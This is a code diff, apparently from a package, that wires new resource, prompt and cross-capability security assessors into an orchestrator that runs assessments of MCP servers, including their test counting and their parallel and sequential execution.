;;OAEG;IACH,SAAS,IAAI,uBAAuB;IAIpC;;OAEG;IACH,YAAY,CAAC,MAAM,EAAE,OAAO,CAAC,uBAAuB,CAAC,GAAG,IAAI;CAG7D"}

package/lib/services/assessment/AssessmentOrchestrator.js

@@ -19,6 +19,10 @@ import { ManifestValidationAssessor } from "./modules/ManifestValidationAssessor
 import { PortabilityAssessor } from "./modules/PortabilityAssessor.js";
 import { ExternalAPIScannerAssessor } from "./modules/ExternalAPIScannerAssessor.js";
 import { TemporalAssessor } from "./modules/TemporalAssessor.js";
+// New capability assessors
+import { ResourceAssessor } from "./modules/ResourceAssessor.js";
+import { PromptAssessor } from "./modules/PromptAssessor.js";
+import { CrossCapabilitySecurityAssessor } from "./modules/CrossCapabilitySecurityAssessor.js";
 // Pattern configuration for tool annotation assessment
 import { loadPatternConfig, compilePatterns, } from "./config/annotationPatterns.js";
 // Claude Code integration for intelligent analysis
@@ -91,6 +95,10 @@ export class AssessmentOrchestrator {
     portabilityAssessor;
     externalAPIScannerAssessor;
     temporalAssessor;
+    // New capability assessors
+    resourceAssessor;
+    promptAssessor;
+    crossCapabilityAssessor;
     constructor(config = {}) {
         this.config = { ...DEFAULT_ASSESSMENT_CONFIG, ...config };
         // Initialize Claude Code Bridge if enabled in config
@@ -144,6 +152,16 @@ export class AssessmentOrchestrator {
             if (this.config.assessmentCategories?.temporal) {
                 this.temporalAssessor = new TemporalAssessor(this.config);
             }
+            // Initialize new capability assessors
+            if (this.config.assessmentCategories?.resources) {
+                this.resourceAssessor = new ResourceAssessor(this.config);
+            }
+            if (this.config.assessmentCategories?.prompts) {
+                this.promptAssessor = new PromptAssessor(this.config);
+            }
+            if (this.config.assessmentCategories?.crossCapability) {
+                this.crossCapabilityAssessor = new CrossCapabilitySecurityAssessor(this.config);
+            }
         }
         // Wire up Claude bridge to TestDataGenerator for intelligent test generation
         if (this.claudeBridge) {
@@ -227,6 +245,16 @@ export class AssessmentOrchestrator {
         if (this.portabilityAssessor) {
             this.portabilityAssessor.resetTestCount();
         }
+        // Reset new capability assessors
+        if (this.resourceAssessor) {
+            this.resourceAssessor.resetTestCount();
+        }
+        if (this.promptAssessor) {
+            this.promptAssessor.resetTestCount();
+        }
+        if (this.crossCapabilityAssessor) {
+            this.crossCapabilityAssessor.resetTestCount();
+        }
     }
     /**
      * Run a complete assessment on an MCP server
@@ -324,6 +352,34 @@ export class AssessmentOrchestrator {
                     return (assessmentResults.temporal = r);
                 }));
             }
+            // New capability assessors
+            if (this.resourceAssessor) {
+                const resourceCount = (context.resources?.length || 0) +
+                    (context.resourceTemplates?.length || 0);
+                emitModuleStartedEvent("Resources", resourceCount * 5, resourceCount);
+                assessmentPromises.push(this.resourceAssessor.assess(context).then((r) => {
+                    emitModuleProgress("Resources", r.status, r, this.resourceAssessor.getTestCount());
+                    return (assessmentResults.resources = r);
+                }));
+            }
+            if (this.promptAssessor) {
+                const promptCount = context.prompts?.length || 0;
+                emitModuleStartedEvent("Prompts", promptCount * 10, promptCount);
+                assessmentPromises.push(this.promptAssessor.assess(context).then((r) => {
+                    emitModuleProgress("Prompts", r.status, r, this.promptAssessor.getTestCount());
+                    return (assessmentResults.prompts = r);
+                }));
+            }
+            if (this.crossCapabilityAssessor) {
+                const capabilityCount = toolCount +
+                    (context.resources?.length || 0) +
+                    (context.prompts?.length || 0);
+                emitModuleStartedEvent("Cross-Capability", capabilityCount * 3, capabilityCount);
+                assessmentPromises.push(this.crossCapabilityAssessor.assess(context).then((r) => {
+                    emitModuleProgress("Cross-Capability", r.status, r, this.crossCapabilityAssessor.getTestCount());
+                    return (assessmentResults.crossCapability = r);
+                }));
+            }
             await Promise.all(assessmentPromises);
         }
         else {
@@ -404,6 +460,30 @@ export class AssessmentOrchestrator {
                     await this.temporalAssessor.assess(context);
                 emitModuleProgress("Temporal", assessmentResults.temporal.status, assessmentResults.temporal, this.temporalAssessor.getTestCount());
             }
+            // New capability assessors (sequential)
+            if (this.resourceAssessor) {
+                const resourceCount = (context.resources?.length || 0) +
+                    (context.resourceTemplates?.length || 0);
+                emitModuleStartedEvent("Resources", resourceCount * 5, resourceCount);
+                assessmentResults.resources =
+                    await this.resourceAssessor.assess(context);
+                emitModuleProgress("Resources", assessmentResults.resources.status, assessmentResults.resources, this.resourceAssessor.getTestCount());
+            }
+            if (this.promptAssessor) {
+                const promptCount = context.prompts?.length || 0;
+                emitModuleStartedEvent("Prompts", promptCount * 10, promptCount);
+                assessmentResults.prompts = await this.promptAssessor.assess(context);
+                emitModuleProgress("Prompts", assessmentResults.prompts.status, assessmentResults.prompts, this.promptAssessor.getTestCount());
+            }
+            if (this.crossCapabilityAssessor) {
+                const capabilityCount = toolCount +
+                    (context.resources?.length || 0) +
+                    (context.prompts?.length || 0);
+                emitModuleStartedEvent("Cross-Capability", capabilityCount * 3, capabilityCount);
+                assessmentResults.crossCapability =
+                    await this.crossCapabilityAssessor.assess(context);
+                emitModuleProgress("Cross-Capability", assessmentResults.crossCapability.status, assessmentResults.crossCapability, this.crossCapabilityAssessor.getTestCount());
+            }
         }
         // Integrate temporal findings into security.vulnerabilities for unified view
         if (assessmentResults.temporal?.rugPullsDetected &&
@@ -466,6 +546,10 @@ export class AssessmentOrchestrator {
         const portabilityCount = this.portabilityAssessor?.getTestCount() || 0;
         const externalAPICount = this.externalAPIScannerAssessor?.getTestCount() || 0;
         const temporalCount = this.temporalAssessor?.getTestCount() || 0;
+        // New capability assessor counts
+        const resourcesCount = this.resourceAssessor?.getTestCount() || 0;
+        const promptsCount = this.promptAssessor?.getTestCount() || 0;
+        const crossCapabilityCount = this.crossCapabilityAssessor?.getTestCount() || 0;
         console.log("[AssessmentOrchestrator] Test counts by assessor:", {
             functionality: functionalityCount,
             security: securityCount,
@@ -480,6 +564,9 @@ export class AssessmentOrchestrator {
             portability: portabilityCount,
             externalAPIScanner: externalAPICount,
             temporal: temporalCount,
+            resources: resourcesCount,
+            prompts: promptsCount,
+            crossCapability: crossCapabilityCount,
         });
         total =
             functionalityCount +
@@ -494,7 +581,10 @@ export class AssessmentOrchestrator {
                 manifestCount +
                 portabilityCount +
                 externalAPICount +
-                temporalCount;
+                temporalCount +
+                resourcesCount +
+                promptsCount +
+                crossCapabilityCount;
         console.log("[AssessmentOrchestrator] Total test count:", total);
         return total;
     }